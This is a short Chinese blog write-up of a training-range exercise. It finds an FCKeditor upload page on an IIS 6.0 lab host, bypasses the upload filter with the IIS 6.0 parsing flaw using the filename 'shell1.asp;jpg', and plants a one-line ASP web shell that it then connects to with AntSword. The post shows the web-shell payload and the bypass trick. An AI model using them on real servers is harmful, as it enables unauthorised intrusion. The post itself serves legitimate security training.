mmzkyl
墨者学院靶场_编辑器漏洞分析溯源(第1题)
11/03
本文最后更新于2021年11月03日,已超过201天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!
随笔
- 2021-11-03 14:04
有点搞心态,使用冰蝎折腾半天全部都是连接失败,重新上传一个马,使用蚁剑一下就连上了
目标靶场
解题思路
- 进入题目默认页面
- 给出了二级目录,但是不清楚一级目录路径,先进行目录扫描
- 通过目录扫描确定其为FCK editor,尝试对其进行利用(百度)
- 通过目录结果能够确定如下链接(版本信息)
http http://219.153.49.228:40620/fckeditor/editor/dialog/fck_about.html http://219.153.49.228:40620/FCKeditor/_whatsnew.html # 该链接能够确定FCK editor版本信息
- 通过目录扫描确定如下链接(上传点)
shell http://219.153.49.228:40620/FCKeditor/editor/filemanager/connectors/test.html http://219.153.49.228:40620/FCKeditor/editor/filemanager/connectors/uploadtest.html
- 直接在上传点进行绕过尝试(失败)后,尝试获取中间件信息
- 得知其为IIS 6.0,配合大名鼎鼎(臭名昭著)的IIS 6.0解析漏洞再次进行上传尝试,先将文件改名为:shell1.asp;jpg
shell <%eval request("a")%>
- 再次进行上传
- 获取到上传路径后,使用蚁剑进行连接即可
- 按照题目要求寻找相应文件并提交即可